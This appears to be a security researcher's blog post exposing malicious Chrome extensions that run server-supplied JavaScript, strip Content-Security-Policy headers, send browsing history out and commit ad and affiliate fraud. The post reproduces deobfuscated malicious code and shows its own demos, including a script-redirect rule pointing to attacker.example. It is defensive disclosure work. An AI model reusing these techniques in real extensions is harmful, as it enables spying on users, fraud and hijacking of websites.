removeRuleIds: l.list.rm,
});
}
This is what I flagged as malicious functionality initially: part of the response is used to add declarativeNetRequest rules dynamically. At first I missed something however: the rest of the data being stored as checklist is also part of the malicious functionality, allowing execution of remote code:
function f() {
let doc = document.documentElement;
function updateHelpInfo(info, k) {
doc.setAttribute(k, info);
doc.dispatchEvent(new CustomEvent(k.substring(2)));
doc.removeAttribute(k);
}
document.addEventListener(
"description",
async ({ detail }) => {
const response = await chrome.runtime.sendMessage(
detail.msg,
);
document.dispatchEvent(
new CustomEvent(detail.responseEvent, {
detail: response,
}),
);
},
);
chrome.storage.local.get("checklist").then(
({ checklist }) => {
if (checklist && checklist.info && checklist.core) {
updateHelpInfo(checklist.info, checklist.core);
}
},
);
}
There is a tabs.onUpdated listener hidden within the legitimate webextension-polyfill module that will run this function for every web page via tabs.executeScript API.
This function looks fairly unsuspicious. Understanding its functionality is easier if you know that checklist.core is "onreset". So it takes the document element, fills its onreset attribute with some JavaScript code from checklist.info, triggers the reset event and removes the attribute again. That’s how this extension runs some server-provided code in the context of every website.
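The trick is easy to reproduce on any web page, entirely without the extension. Here is a minimal standalone demo of the mechanism; the payload string is obviously made up:

// Put JavaScript code into an inline event handler attribute, fire the matching
// event, then remove the attribute again to hide the traces. Note that a page's
// CSP would normally block such inline handlers – which is exactly why the
// extension also strips Content-Security-Policy headers (see below).
const doc = document.documentElement;
doc.setAttribute("onreset", "console.log('server-provided code runs here');");
doc.dispatchEvent(new CustomEvent("reset"));
doc.removeAttribute("onreset");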
When the extension downloads its “checklist” immediately after installation the server response will be empty. Sort of: “nothing to see here, this is merely some dead code somebody forgot to remove.” The server sets a cookie however, allowing it to recognize the user on subsequent downloads. And only after two weeks or so will it respond with the real thing. For example, the list key of the response then looks like this:
"add": [
{
"action": {
"responseHeaders": [
{
"header": "Content-Security-Policy-Report-Only",
"operation": "remove"
},
{
"header": "Content-Security-Policy",
"operation": "remove"
}
],
"type": "modifyHeaders"
},
"condition": {
"resourceTypes": [
"main_frame"
],
"urlFilter": "*"
},
"id": 98765432,
"priority": 1
}
],
"rm": [
98765432
]
No surprise here, this is about removing Content Security Policy protection from all websites, making sure it doesn’t interfere when the extension injects its code into web pages.
As I already mentioned, the core key of the response is "onreset", an essential component towards executing the JavaScript code. And the JavaScript code in the info key is heavily obfuscated by JavaScript Obfuscator, with most strings and property names encrypted to make reverse engineering harder.
Of course this kind of obfuscation can still be reversed, and you can see the entire deobfuscated code here. Note that most function and variable names have been chosen randomly, the original names being meaningless. The code consists of three parts:
Marshalling of various extension APIs: tabs, storage, declarativeNetRequest. This uses DOM events to communicate with the function f() mentioned above; that function forwards the messages to the extension’s background worker, and the worker then calls the respective APIs.
In principle, this allows reading out your entire browser state: how many tabs, what pages are loaded etc. Getting notified on changes is possible as well. The code doesn’t currently use this functionality, but the server can of course produce a different version of it any time, for all users or only for selected targets.
There is also another aspect here: in order to run remote code, this code has been moved into the website realm. This means however that any website can abuse these APIs as well. It’s only a matter of knowing which DOM events to send. Yes, this is a massive security issue.
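For illustration, this is roughly what any unrelated website could do to use that bridge, based on the event names in the code above. The exact message format the background worker expects is an assumption here.

// Listen for the response under an event name of our choosing...
document.addEventListener("my-response", event => {
  console.log("data from the extension:", event.detail);
});

// ...then ask the content script to forward an arbitrary message to the
// extension's background worker.
document.dispatchEvent(new CustomEvent("description", {
  detail: {
    msg: { action: "tabs.query", args: [{}] }, // assumed message format
    responseEvent: "my-response",
  },
}));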
Code downloading a 256 KiB binary blob from https://st.internetdownloadmanager.top/bff and storing it in encoded form as bff key in the extension storage. No, this isn’t your best friend forever but a Bloom filter. This filter is applied to SHA-256 hashes of domain names and determines on which domain names the main functionality should be activated.
With a Bloom filter it is impossible to determine which exact data went into it. It is possible however to try out guesses and see which ones it accepts. Here is the list of matching domains that I could find. This list looked random to me initially, and I even suspected that noise had been added to it in order to hide the real target domains. Later however I could identify it as the list of adindex advertisers, see below.
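Here is a sketch (Node.js) of how such guessing works: hash each candidate domain and check whether all of the derived bit positions are set in the filter. The number of hashes and the way bit indices are derived from the SHA-256 digest are assumptions here, not the extension’s actual parameters.

const crypto = require("crypto");

function bitIsSet(filter, index) {
  return ((filter[index >> 3] >> (index & 7)) & 1) === 1;
}

function mightContain(filter, domain, hashCount = 4) {
  const digest = crypto.createHash("sha256").update(domain).digest();
  for (let i = 0; i < hashCount; i++) {
    // Derive one bit index per "hash" from the digest (illustrative only).
    const index = digest.readUInt32BE(i * 4) % (filter.length * 8);
    if (!bitIsSet(filter, index))
      return false; // definitely not in the filter
  }
  return true; // possibly in the filter, worth a closer look
}

// Test a list of guesses against the downloaded 256 KiB filter:
// candidateDomains.filter(domain => mightContain(bloomFilter, domain));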
The main functionality: when active, it sends the full address of the current page to https://st.internetdownloadmanager.top/cwc2 and might get a “session” identifier back. It is likely that this server stores the addresses it receives and sells the resulting browsing history. This part of the functionality stays hidden however.
The “session” handling is visible on the other hand. There is some rate limiting here, making sure that this functionality is triggered at most once per minute and no more than once every 12 hours for each domain. If activated, a message is sent back to the extension’s background worker telling it to connect to wss://pa.internetdownloadmanager.top/s/<session>. All further processing happens there.
Here we are back in the extension’s static code, no longer remotely downloaded code. The entry point for the “session” handling is function __create. Its purpose has been concealed, with some essential property and method names contained in the obfuscated code above or received from the web socket connection. I filled in these parts and simplified the code to make it easier to understand:
var __create = url => {
const socket = new this.WebSocket(url);
const buffer = {};
socket.onmessage = event => {
let message = event.data.arrayBuffer ? event.data : JSON.parse(event.data);
this.stepModifiedMatcher(socket, buffer, message)
};
};
stepModifiedMatcher =
async (socket, buffer, message) => {
if (message.arrayBuffer)
buffer[1] = message.arrayBuffer();
else {
let [url, options] = message;
if (buffer[1]) {
options.body = await buffer[1];
buffer[1] = null;
}
let response = await this.fetch(url, options);
let data = await Promise.all([
!message[3] ? response.arrayBuffer() : false,
JSON.stringify([...response.headers.entries()]),
response.status,
response.url,
response.redirected,
]);
for (const entry of data) {
if (socket.readyState === 1) {
socket.send(entry);
}
}
}
};
This receives instructions from the web socket connection on what requests to make. Upon success the extension sends information like response text, HTTP headers and HTTP status back to the server.
What is this good for? Before I could observe this code in action I was left guessing. Is this an elaborate approach to de-anonymize users? On some websites their name will be right there in the server response. Or is this about session hijacking? There would be session cookies in the headers and CSRF tokens in the response body, so the extension could be instrumented to perform whatever actions are necessary on behalf of the attackers – like initiating a money transfer once the user logs into their PayPal account.
The reality turned out to be far more mundane. When I finally managed to trigger this functionality on the Ashley Madison website, I saw the extension perform lots of web requests. Apparently, it was replaying a browsing session that was recorded two days earlier with the Firefox browser. The entry point of this session: https://api.sslcertifications.org/v1/redirect?advertiserId=11EE385A29E861E389DA14DDA9D518B0&adspaceId=11EE4BCA2BF782C589DA14DDA9D518B0&customId=505 (redirecting to ashleymadison.com).
The server handling api.sslcertifications.org belongs to the German advertising company adindex. Their list of advertisers is mostly identical to the list of domains matched by the Bloom filter the extension uses. So this is ad fraud: the extension generates fake link clicks, making sure its owner earns money for “advertising” websites like Ashley Madison. It uses the user’s IP address and replays recorded sessions to make this look like legitimate traffic, hoping to avoid detection this way.
I contacted adindex and they confirmed that sslcertifications.org is a domain registered by a specific publisher but handled by adindex. They also said that they confronted the publisher in question with my findings and, having found their response unsatisfactory, blocked this publisher. Shortly afterwards the internetdownloadmanager.top domain became unreachable, and api.sslcertifications.org site no longer has a valid SSL certificate. Domains related to other extensions, the ones I didn’t mention in my request, are still accessible.
The adindex CEO declined to provide the identity of the problematic publisher. There are obvious data protection reasons for that. However, as I looked further I realized that he might have additional reasons to withhold this information.
While most extensions I list provide clearly fake names and addresses, the Auto Quality for YouTube™ extension is associated with the MegaXT website. That website doesn’t merely feature a portfolio of two browser extensions (the second one being an older Manifest V2 extension also geared towards running remote code) but also a real owner with a real name. Who just happens to be a developer at adindex.
There is also the company eokoko GmbH, developing the Auto Resolution Quality for YouTube™ extension. This extension appears to be non-malicious at the moment, yet it shares a number of traits with the malicious extensions on my list. The director of this company is once again the same adindex developer.
And not just any developer. According to his website he used to be CTO at adindex in 2013 (I couldn’t find an independent confirmation for this). He also founded a company together with the adindex CEO in 2018, something that is confirmed by public records.
When I mentioned this connection in my communication with adindex CEO the response was:
[He] works for us as a freelancer in development. Employees (including freelancers) are generally not allowed to operate publisher accounts at adindex and the account in question does not belong to [this developer]. Whether he operates extensions is actually beyond my knowledge.
I want to conclude this article with some assorted history facts:
As noted last week I consider it highly problematic that Google for a long time allowed extensions to run code they downloaded from some web server, an approach that Mozilla prohibited long before Google even introduced extensions to their browser. For years this has been an easy way for malicious extensions to hide their functionality. When Google finally changed their mind, it wasn’t in the form of a policy but rather a technical change introduced with Manifest V3.
As with most things about Manifest V3, these changes are meant for well-behaving extensions where they in fact improve security. As readers of this blog probably know, those who want to find loopholes will find them: I’ve already written about the Honey extension bundling its own JavaScript interpreter and malicious extensions essentially creating their own programming language. This article looks into more approaches I found used by malicious extensions in Chrome Web Store. And maybe Google will decide to prohibit remote code as a policy after all.
Update (2025-01-20): Added two extensions to the bonus section. Also indicated in the tables which extensions are currently featured in Chrome Web Store.
Update (2025-01-21): Got a sample of the malicious configurations for Phoenix Invicta extensions. Added a section describing it and removed “But what do these configurations actually do” section. Also added a bunch more domains to the IOCs section.
Update (2025-01-28): Corrected the “Netflix Party” section, Flipshope extension isn’t malicious after all. Also removed the attribution subsection here.
This article originally started as an investigation into Phoenix Invicta Inc. Consequently, this is the best researched part of it. While I could attribute only 14 extensions with rather meager user numbers to Phoenix Invicta, that’s likely because they’ve only started recently. I could find a large number of domain names, most of which aren’t currently being used by any extensions. A few are associated with extensions that have been removed from Chrome Web Store but most seem to be reserved for future use.
It can be assumed that these extensions are meant to inject ads into web pages, yet Phoenix Invicta clearly put some thought into plausible deniability. They can always claim their execution of remote code to be a bug in their otherwise perfectly legitimate extension functionality. So it will be interesting to see how Google will deal with these extensions, lacking (to my knowledge) any policies that apply here.
The malicious intent is a bit more obvious with Netflix Party and related extensions. This shouldn’t really come as a surprise to Google: the most popular extension of the group was a topic on this blog back in 2023, and a year before that McAfee already flagged two extensions of the group as malicious. Yet here we are, and these extensions are still capable of spying, affiliate fraud and cookie stuffing as described by McAfee. If anything, their potential to do damage has only increased.
Finally, the group of extensions around Sweet VPN is the most obviously malicious one. To be fair, what these extensions do is probably best described as obfuscation rather than remote code execution. Still, they download extensive instructions from their web servers even though these aren’t too flexible in what they can do without requiring changes to the extension code. Again there is spying on the users and likely affiliate fraud as well.
In the following sections I will be discussing each group separately, listing the extensions in question at the end of each section. There is also a complete list of websites involved in downloading instructions at the end of the article.
Let’s first take a look at an extension called “Volume Booster - Super Sound Booster.” It is one of several similar extensions and it is worth noting that the extension’s code is neither obfuscated nor minified. It isn’t hiding any of its functionality, relying on plausible deniability instead.
For example, in its manifest this extension requests access to all websites:
"host_permissions": [
"http://*/*",
"https://*/*"
],
Well, it obviously needs that access because it might have to boost volume on any website. Of course, it would be possible to write this extension in a way that the activeTab permission would suffice. But it isn’t built in this way.
Similarly, one could easily write a volume booster extension that doesn’t need to download a configuration file from some web server. In fact, this extension works just fine with its default configuration. But it will still download its configuration roughly every six hours just in case (code slightly simplified for readability):
let res = await fetch(`https://super-sound-booster.info/shortcuts?uuid=${userId}`,{
method: 'POST',
body: JSON.stringify({installParams}),
headers: { 'Content-Type': 'text/plain' }
});
let data = await res.json();
if (data.shortcuts) {
chrome.storage.local.set({
shortcuts: {
list: data.shortcuts,
updatedAt: Date.now(),
}
});
}
if (data.volumeHeaders) {
chrome.storage.local.set({
volumeHeaderRules: data.volumeHeaders
});
}
if (data.newsPage) {
this.openNewsPage(data.newsPage.pageId, data.newsPage.options);
}
This will send a unique user ID to a server which might then respond with a JSON file. Conveniently, the three possible values in this configuration file correspond to the three malicious functions of the extension.
The extension contains a default “shortcut” which it will inject into all web pages, typically showing up as a small button in the lower right corner of the page.
And if you move your mouse pointer to that button, a message shows up.
That’s it, it doesn’t do anything else. This “feature” makes no sense but it provides the extension with plausible deniability: it has a legitimate reason to inject HTML code into all web pages.
And of course that “shortcut” is remotely configurable. So the shortcuts value in the configuration response can define other HTML code to be injected, along with a regular expression determining which websites it should be applied to.
“Accidentally” this HTML code isn’t subject to the remote code restrictions that apply to browser extensions. After all, any JavaScript code contained here would execute in the context of the website, not in the context of the extension. While that code wouldn’t have access to the extension’s privileges, the end result is pretty much the same: it could e.g. spy on the user as they use the web page, transmit login credentials being entered, inject ads into the page and redirect searches to a different search engine.
There is only a slight issue here: a website might use a security mechanism called Content Security Policy (CSP). And that mechanism can for example restrict what kind of scripts are allowed to run on the web site, in the same way the browser restricts the allowed scripts for the extension.
The extension solves this issue by abusing the immensely powerful declarativeNetRequest API. Looking at the extension manifest, a static rule is defined for this API:
[
{
"id": 1,
"priority": 1,
"action": {
"type": "modifyHeaders",
"responseHeaders": [
{ "header": "gain-id", "operation": "remove" },
{ "header": "basic-gain", "operation": "remove" },
{ "header": "audio-simulation-64-bit", "operation": "remove" },
{ "header": "content-security-policy", "operation": "remove" },
{ "header": "audio-simulation-128-bit", "operation": "remove" },
{ "header": "x-frame-options", "operation": "remove" },
{ "header": "x-context-audio", "operation": "remove" }
]
},
"condition": { "urlFilter": "*", "resourceTypes": ["main_frame","sub_frame"] }
}
]
This removes a bunch of headers from all HTTP responses. Most headers listed here are red herrings – a gain-id HTTP header for example doesn’t really exist. But removing the Content-Security-Policy header is meant to disable CSP protection on all websites. And removing the X-Frame-Options header disables another security mechanism that might prevent injecting frames into a website. This probably means that the extension is meant to inject advertising frames into websites.
But these default declarativeNetRequest rules aren’t the end of the story. The volumeHeaders value in the configuration response allows adding more rules whenever the server decides that some are needed. As these rules aren’t code, the usual restrictions against remote code don’t apply here.
The name seems to suggest that these rules are all about messing with HTTP headers. And maybe this actually happens, e.g. adding cookie headers required for cookie stuffing. But judging by other extensions the main point is rather preventing any installed ad blockers from blocking ads displayed by the extension. Yet these rules provide even more damage potential. For example, declarativeNetRequest allows “redirecting” requests, which at first glance is a very convenient way to perform affiliate fraud. It also allows “redirecting” requests when a website loads a script from a trusted source, making it get a malicious script instead – another way to hijack websites.
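As a purely hypothetical illustration (rule ID and addresses are made up), a single dynamic rule pushed via the volumeHeaders mechanism would be enough to silently swap out a script that websites load from a trusted source:

chrome.declarativeNetRequest.updateDynamicRules({
  addRules: [{
    id: 4242,
    priority: 1,
    condition: {
      urlFilter: "||trusted-cdn.example/analytics.js",
      resourceTypes: ["script"],
    },
    action: {
      type: "redirect",
      redirect: { url: "https://attacker.example/not-analytics.js" },
    },
  }],
});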
Side-note: This abuse potential is the reason why legitimate ad blockers, while downloading their rules from a web server, never make these rules as powerful as the declarativeNetRequest API. It’s bad enough that a malicious rule could break the functionality of a website, but it shouldn’t be able to spy on the user for example.
Finally, there is the newsPage value in the configuration response. It is passed to the openNewsPage function which is essentially a wrapper around tabs.create() API. This will load a page in a new tab, something that extension developers typically use for benign things like asking for donations.
Except that Volume Booster and similar extensions don’t merely take a page address from the configuration but also some options. Volume Booster will take any options, other extensions will sometimes allow only specific options instead. One option that the developers of these extensions seem to particularly care about is active, which allows opening tabs in the background. This makes me suspect that the point of this feature is displaying pop-under advertisements.
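For reference, opening such a background tab takes exactly one call, so a newsPage value only needs to carry active: false along with the page address (the address here is made up):

chrome.tabs.create({ url: "https://ads.example/landing-page", active: false });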
There are many extensions similar to Volume Booster, and they all follow a similar general approach: have the server provide rules for the declarativeNetRequest API. Alternatively (or additionally), use static rules in the extension that will remove pesky security headers from all websites; nobody will ask why you need that.

Not all extensions implement all of this. With some of the extensions the malicious functionality seems incomplete. I assume that it isn’t being added all at once; instead, support for malicious configurations is added slowly to avoid raising suspicions. And maybe for some extensions the current state is considered “good enough,” so nothing more is to come there.
After I already published this article I finally got a sample of the malicious “shortcut” value, to be applied on all websites. Unsurprisingly, it had the form:
<img height="1" width="1" src="data:image/gif;base64,…"
onload="(() => {…})();this.remove()">
This injects an invisible image into the page, runs some JavaScript code via its load event handler and removes the image again. The JavaScript code consists of two code blocks. The first block goes like this:
if (isGoogle() || isFrame()) {
hideIt();
const script = yield loadScript();
if (script) {
window.eval.call(window, script);
window.gsrpdt = 1;
window.gsrpdta = '_new'
}
}
The isGoogle function looks for a Google subdomain and a query – this is about search pages. The isFrame function looks for frames but excludes “our frames” where the address contains all the strings q=, frmid and gsc.page. The loadScript function fetches a script from https://shurkul[.]online/v1712/g1001.js. This script then injects a hidden frame into the page, loaded either from kralforum.com.tr (Edge) or rumorpix.com (other browsers). There is also some tracking to an endpoint on dev.astralink.click but the main logic operating the frame is in the other code block.
The second code block looks like this (somewhat simplified for readability):
if (window.top == window.self) {
let response = await fetch('https://everyview.info/c', {
method: 'POST',
body: btoa(unescape(encodeURIComponent(JSON.stringify({
u: 'm5zthzwa3mimyyaq6e9',
e: 'ojkoofedgcdebdnajjeodlooojdphnlj',
d: document.location.hostname,
t: document.title,
'iso': 4
})))),
headers: {
'Content-Type': 'text/plain'
},
credentials: 'include'
});
let text = await response.text();
runScript(decodeURIComponent(escape(atob(text))));
} else {
window.addEventListener('message', function(event) {
event && event.data && event.data.boosterWorker &&
event.data.booster && runScript(event.data.booster);
});
}
So for top-level documents this downloads some script from everyview.info and runs it. That script in turn injects another script from lottingem.com. And that script loads some ads from gulkayak.com or topodat.info as well as Google ads, makes sure these are displayed in the frame and positions the frame above the search results. The result is ads which can barely be distinguished from actual search results, which is exactly what I got when searching for “amazon” for example.
The second code block also has some additional tracking going to doubleview.online, astato.online, doublestat.info, triplestat.online domains.
The payloads I got for the Manual Finder 2024 and Manuals Viewer extensions are similar but not identical. In particular, these use the fivem.com.tr domain for the frame. But the result is essentially the same: ads that are almost impossible to distinguish from the search results. In the screenshot I took, the link at the bottom was a search result while the one right above it was an ad.
These extensions are associated with a company named Phoenix Invicta Inc, formerly Funteq Inc. While supposedly a US company of around 20 people, its terms of service claim to be governed by Hong Kong law, all while the company hires its employees in Ukraine. While it doesn’t seem to have any physical offices, the company offers its employees the use of two co-working spaces in Kyiv. To add even more confusion, Funteq Inc. was registered in the US with its “office address” being a two room apartment in Moscow.
Before founding this company in 2016 its CEO worked as CTO of something called Ormes.ru. Apparently, Ormes.ru was in the business of monetizing apps and browser extensions. Its sales pitches can still be found all over the web, offering extension developers ways to earn money with various kinds of ads. Clearly, there has been some competence transfer here.
Occasionally Phoenix Invicta websites will claim to be run by another company named Damiko Inc. Of course these claims don’t have to mean anything, as the same websites will also occasionally claim to be run by a company in the business of … checks notes … selling knives.
Yet Damiko Inc. is officially offering a number of extensions in the Chrome Web Store. And while these certainly aren’t the same as the Phoenix Invicta extensions, all but one of these extensions share certain similarities with them. In particular, these extensions remove the Content-Security-Policy HTTP header despite having no means of injecting HTML content into web pages from what I can tell.
Damiko Inc. appears to be a subsidiary of the Russian TomskSoft LLC, operating in the US under the name Tomsk Inc. How does this fit together? Did TomskSoft contract Phoenix Invicta to develop browser extensions for them? Or is Phoenix Invicta another subsidiary of TomskSoft? Or some other construct maybe? I don’t know. I asked TomskSoft for comment on their relationship with this company but haven’t received a response so far.
The following extensions are associated with Phoenix Invicta:
| Name | Weekly active users | Extension ID | Featured |
|---|---|---|---|
| Click & Pick | 20 | acbcnnccgmpbkoeblinmoadogmmgodoo | |
| AdBlock for Youtube: Skip-n-Watch | 3,000 | coebfgijooginjcfgmmgiibomdcjnomi | |
| Dopni - Automatic Cashback Service | 19 | ekafoahfmdgaeefeeneiijbehnbocbij | |
| SkipAds Plus | 95 | emnhnjiiloghpnekjifmoimflkdmjhgp | |
| 1-Click Color Picker: Instant Eyedropper (hex, rgb, hsl) | 10,000 | fmpgmcidlaojgncjlhjkhfbjchafcfoe | |
| Better Color Picker - pick any color in Chrome | 10,000 | gpibachbddnihfkbjcfggbejjgjdijeb | |
| Easy Dark Mode | 869 | ibbkokjdcfjakihkpihlffljabiepdag | |
| Manuals Viewer | 101 | ieihbaicbgpebhkfebnfkdhkpdemljfb | |
| ScreenCapX - Full Page Screenshot | 20,000 | ihfedmikeegmkebekpjflhnlmfbafbfe | |
| Capture It - Easy Screenshot Tool (Full Page, Selected, Visible Area) | 48 | lkalpedlpidbenfnnldoboegepndcddk | |
| AdBlock - Ads and Youtube | 641 | nonajfcfdpeheinkafjiefpdhfalffof | |
| Manual Finder 2024 | 280 | ocbfgbpocngolfigkhfehckgeihdhgll | |
| Volume Booster - Super Sound Booster | 8,000 | ojkoofedgcdebdnajjeodlooojdphnlj | |
| Font Expert: Identify Fonts from Images & Websites | 666 | pjlheckmodimboibhpdcgkpkbpjfhooe | |
The following table also lists the extensions officially developed by Damiko Inc. With these, there is no indication of malicious intent, yet all but the last one share similarities with Phoenix Invicta extensions above and remove security headers.
| Name | Weekly active users | Extension ID | Featured |
|---|---|---|---|
| Screen Recorder | 685 | bgnpgpfjdpmgfdegmmjdbppccdhjhdpe | |
| Halloween backgrounds and stickers for video calls and chats | 31 | fklkhoeemdncdhacelfjeaajhfhoenaa | |
| AI Webcam Effects + Recorder: Google Meet, Zoom, Discord & Other Meetings | 46 | iedbphhbpflhgpihkcceocomcdnemcbj | ✓ |
| Beauty Filter | 136 | mleflnbfifngdmiknggikhfmjjmioofi | |
| Background Noise Remover | 363 | njmhcidcdbaannpafjdljminaigdgolj | |
| Camera Picture In Picture (PIP Overlay) | 576 | pgejmpeimhjncennkkddmdknpgfblbcl | |
Back in 2023 I pointed out that “Adblock all advertisements” is malicious and spying on its users. A year earlier McAfee already called out a bunch of extensions as malicious. For whatever reason, Google decided to let Adblock all advertisements stay, and three extensions from the McAfee article also remained in Chrome Web Store: Netflix Party, FlipShope and AutoBuy Flash Sales. Out of these three, Netflix Party and AutoBuy Flash Sales still (or again) contain malicious functionality.
Update (2025-01-28): This article originally claimed that FlipShope extension was also malicious and listed this extension cluster under the name of its developing company, Technosense Media. This was incorrect, the extension merely contained some recognizable but dead code. According to Technosense Media, they bought the extension in 2023. Presumably, the problematic code was introduced by the previous extension owner and is unused.
Coming back to Adblock all advertisements, it is still clearly spying on its users, using ad blocking functionality as a pretense to send the address of each page visited to its server (code slightly simplified for readability):
chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
if ("complete" === changeInfo.status) {
let params = {
url: tab.url,
userId: await chrome.storage.sync.get("userId")
};
const response = await fetch("https://smartadblocker.com/extension/rules/api", {
method: "POST",
credentials: "include",
headers: { "Content-Type": "application/json" },
body: JSON.stringify(params)
});
const rules = await response.json();
…
}
});
Supposedly, this code downloads a set of site-specific rules. This could in theory be legitimate functionality not meant to spy on users. The fact that the endpoint doesn’t produce any really meaningful responses is only one indication that it isn’t legitimate here. Legitimate functionality that doesn’t intend to spy wouldn’t send a unique user ID with the request, the page address would be cut down to the host name (or would at least have all parameters removed), and the response would be cached. The latter would happen simply to reduce the load on this endpoint, something that anybody does unless the endpoint is being paid for with users’ data.
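For contrast, here is a sketch of what a privacy-respecting variant of such a rules download could look like, with a hypothetical endpoint and storage layout: no user ID, only the host name, and a response that is cached for a day.

chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
  if (changeInfo.status !== "complete" || !tab.url)
    return;

  const { hostname } = new URL(tab.url);
  const cached = (await chrome.storage.local.get(hostname))[hostname];
  if (cached && Date.now() - cached.updatedAt < 24 * 60 * 60 * 1000)
    return; // reuse the cached rules instead of telling the server about every page load

  const response = await fetch(`https://rules.example/site/${encodeURIComponent(hostname)}`);
  const rules = await response.json();
  await chrome.storage.local.set({ [hostname]: { rules, updatedAt: Date.now() } });
});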
Nothing about the section above is new, I’ve already written as much in 2023. But either I didn’t take a close look at the rule processing back then or it has gotten considerably worse. Here is what it looks like today (variable and function naming is mine, the code was minified):
for (const key in rules)
  if ("id" === key || "genericId" === key) {
    // Remove elements by ID
  } else if ("class" === key || "genericClass" === key) {
    // Remove elements by class name
  } else if ("innerText" === key) {
    // Remove elements by text
  } else if ("rules" === key) {
    if (rules.updateRules)
      applyRules(rules[key], rules.rule_scope, tabId);
  } else if ("cc" === key) {
    // Bogus logic to let the server decide which language-specific filter list
    // should be enabled
  }
The interesting part here is the applyRules call which conveniently isn’t triggered by the initial server responses (updateRules key is set to false). This function looks roughly like this:
async function applyRules(rules, scope, tabId) {
if ("global" !== scope) {
if (0 !== rules.length) {
const existingRules = await chrome.declarativeNetRequest.getDynamicRules();
const ruleIds = existingRules.map(rule => rule.id);
chrome.declarativeNetRequest.updateDynamicRules({
removeRuleIds: ruleIds,
addRules: rules
});
}
} else {
chrome.tabs.sendMessage(tabId, {
message: "start",
link: rules
});
}
}
So if the “scope” is anything but "global", the rules provided by the server will be added via the declarativeNetRequest API. Modifying these rules on a per-request basis makes no sense for ad blocking, but it opens up rich possibilities for abuse as we’ve seen already. Given what McAfee discovered about these extensions before, this is likely meant for cookie stuffing, yet execution of arbitrary JavaScript code in the context of targeted web pages is also a possible scenario.
And if the “scope” is "global" the extension sends a message to its content script which will inject a frame with the given address into the page. Again, this makes no sense whatsoever for blocking ads, but it definitely works for affiliate fraud – which is what these extensions are all about according to McAfee.
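The content script side isn’t shown above, but judging by the message format it receives it likely boils down to something like this (a reconstruction based on the description, not the extension’s actual code):

chrome.runtime.onMessage.addListener(request => {
  if (request.message === "start") {
    const frame = document.createElement("iframe");
    frame.src = request.link;          // server-provided address
    frame.style.display = "none";      // invisible to the user
    document.body.appendChild(frame);  // the hidden page loads with the user's cookies
  }
});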
Depending on the extension there might be only frame injection or only adding of dynamic rules. Given the purpose of the AutoBuy extension, it can probably pass as legitimate by Google’s rules, others not so much.
| Name | Weekly active users | Extension ID | Featured |
|---|---|---|---|
| Auto Refresh Plus | 100,000 | ffejlioijcokmblckiijnjcmfidjppdn | |
| Smart Auto Refresh | 100,000 | fkjngjgmgbfelejhbjblhjkehchifpcj | ✓ |
| Adblock all advertisement - No Ads extension | 700,000 | gbdjcgalliefpinpmggefbloehmmknca | ✓ |
| AutoBuy Flash Sales, Deals, and Coupons | 20,000 | gbnahglfafmhaehbdmjedfhdmimjcbed | |
| Autoskip for Youtube™ Ads | 200,000 | hmbnhhcgiecenbbkgdoaoafjpeaboine | |
| Smart Adblocker | 50,000 | iojpcjjdfhlcbgjnpngcmaojmlokmeii | ✓ |
| Adblock for Browser | 10,000 | jcbjcocinigpbgfpnhlpagidbmlngnnn | |
| Netflix Party | 500,000 | mmnbenehknklpbendgmgngeaignppnbe | |
| Free adblocker | 8,000 | njjbfkooniaeodkimaidbpginjcmhmbm | ✓ |
| Video Ad Block Youtube | 100,000 | okepkpmjhegbhmnnondmminfgfbjddpb | ✓ |
| Picture in Picture for Videos | 30,000 | pmdjjeplkafhkdjebfaoaljknbmilfgo | |
Update (2025-01-28): Added Auto Refresh Plus and Picture in Picture for Videos to the list. The former only contains the spying functionality, the latter spying and frame injection.
I’ll be looking at Sweet VPN as a representative of the 32 extensions I found using highly obfuscated code. These extensions aren’t exactly new to this blog either, my post in 2023 already named three of them even though I couldn’t identify the malicious functionality back then. Most likely I simply overlooked it; I didn’t have time to investigate each extension thoroughly.
These extensions also decided to circumvent remote code restrictions but their approach is way more elaborate. They download some JSON data from the server and add it to the extension’s storage. While some keys like proxy_list are expected here and always present, a number of others are absent from the server response when the extension is first installed. These can contain malicious instructions.
For example, the four keys 0, 1, 2, 3 seem to be meant for anti-debugging protection. If present, the values of these keys are concatenated and parsed as JSON into an array. A property resolution mechanism then allows resolving arbitrarily deep values, starting at the self object of the extension’s background worker. The result is three values which are used like this:
value1({value2: value3}, result => {
…
});
This call is repeated every three seconds. If result is a non-empty array, the extension removes all but a few storage keys and stops further checks. This is clearly meant to remove traces of malicious activity. I am not aware of any ways for an extension to detect an open Developer Tools window, so this call is probably meant to detect the extension management page that Developer Tools are opened from:
chrome.tabs.query({"url": "chrome://extensions/*"}, result => {
…
});
This protection mechanism is only a very small part of the obfuscated logic in the extension. There are lots of values being decoded, tossed around, used in some function calls. It is difficult to reconstruct the logic with the key parts missing. However, the extension doesn’t have too many permissions:
"permissions": [
"proxy",
"storage",
"tabs"
],
"host_permissions": [
"https://ipapi.co/json/",
"https://ip.seeip.org/geoip",
"https://api.myip.com/",
"https://ifconfig.co/json"
],
Given that almost no websites can be accessed directly, it’s a safe bet that the purpose of the concealed functionality is spying on the users. That’s what the tabs permission is for, to be notified of any changes in the user’s browsing session.
In fact, once you know that the function being passed as parameter is a tabs.onUpdated listener its logic becomes way easier to understand, despite the missing parts. So the cl key in the extension’s storage (other extensions often use other names) is the event queue where data about the user’s browsing is being stored. Once there are at least 10 events the queue is sent to the same address where the extension downloads its configuration from.
There are also some chrome.tabs.update() calls in the code, replacing the address of the currently loading page by something else. It’s hard to be certain what these are used for: it could be search redirection, affiliate fraud or plainly navigating to advertising pages.
| Name | Weekly active users | Extension ID | Featured |
|---|---|---|---|
| VK UnBlock. Works fast. | 40,000 | ahdigjdpekdcpbajihncondbplelbcmo | |
| VPN Proxy Master | 120 | akkjhhdlbfibjcfnmkmcaknbmmbngkgn | |
| VPN Unblocker for Instagram | 8,000 | akmlnidakeiaipibeaidhlekfkjamgkm | |
| StoriesHub | 100,000 | angjmncdicjedpjcapomhnjeinkhdddf | ✓ |
| Facebook and Instagram Downloader | 30,000 | baajncdfffcpahjjmhhnhflmbelpbpli | |
| Downloader for Instagram - ToolMaster | 100,000 | bgbclojjlpkimdhhdhbmbgpkaenfmkoe | ✓ |
| TikTok in USA | 20,000 | bgcmndidjhfimbbocplkapiaaokhlcac | ✓ |
| Sweet VPN | 100,000 | bojaonpikbbgeijomodbogeiebkckkoi | ✓ |
| Access to Odnoklassniki | 4,000 | ccaieagllbdljoabpdjiafjedojoejcl | |
| Ghost - Anonymous Stories for Instagram | 20,000 | cdpeckclhmpcancbdihdfnfcncafaicp | ✓ |
